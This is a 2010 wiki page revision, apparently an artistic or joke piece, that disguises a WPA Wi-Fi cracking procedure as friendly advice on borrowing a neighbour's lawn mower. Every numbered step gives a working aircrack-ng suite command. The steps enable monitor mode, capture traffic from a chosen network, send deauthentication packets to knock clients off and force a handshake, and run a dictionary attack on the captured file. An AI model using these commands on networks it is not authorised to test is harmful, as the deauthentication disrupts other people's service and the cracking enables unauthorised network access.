User:Laurier Rochon/bbb/lawnmower1: Difference between revisions

From XPUB & Lens-Based wiki
(Created page with "#install a lawn mower rack in your shed to prepare , type : sudo apt-get install aircrack-ng #check if the w-tools are present in the shed too, type : sudo aptitude show wireless...")
 
No edit summary
Line 1: Line 1:
== How to nicely ask to borrow your friend's Wonder Precise Antique lawn mower ==
#install a lawn mower rack in your shed to prepare , type : sudo apt-get install aircrack-ng
#install a lawn mower rack in your shed to prepare , type : sudo apt-get install aircrack-ng
#check if the w-tools are present in the shed too, type : sudo aptitude show wireless-tools
#check if the w-tools are present in the shed too, type : sudo aptitude show wireless-tools

Revision as of 01:05, 15 October 2010

How to nicely ask to borrow your friend's Wonder Precise Antique lawn mower

  1. install a lawn mower rack in your shed to prepare , type : sudo apt-get install aircrack-ng
  2. check if the w-tools are present in the shed too, type : sudo aptitude show wireless-tools
  3. if they are, move on, if not, get the tools with : sudo apt-get wireless-tools
  4. make sure the lawn mower rack is of the right type, (type) : sudo airmon-ng
  5. just to be super-sure, double-check for trouble by typing : sudo airmon-ng check wlan0
  6. if any issues show up on the lawn mower rack after, terminate them, type : sudo kill -9 PROCESSNUMBER
  7. put up a camera in the shed to see who comes in and out, type : sudo airmon-ng start wlan0
  8. summon all your friends for a party, in view of asking one to use his/her lawn mower : sudo airodump-ng mon0
  9. once you have made a choice of who to trust, approach this friend, type : sudo airodump-ng -t WPA -c CHANNEL# --bssid BSSID# -w FILENAME# mon0
  10. in case they resist a little, give them some incentive by typing : sudo aireplay-ng -0 5 -a BSSID# -c STATION# mon0
  11. you can repeat this step if it's necessary.
  12. once they give you the handshake of approval, go to the shed type : sudo aircrack-ng -w DICTIONARY_FILE FILENAME.cap
  13. congratulations, and happy mowing!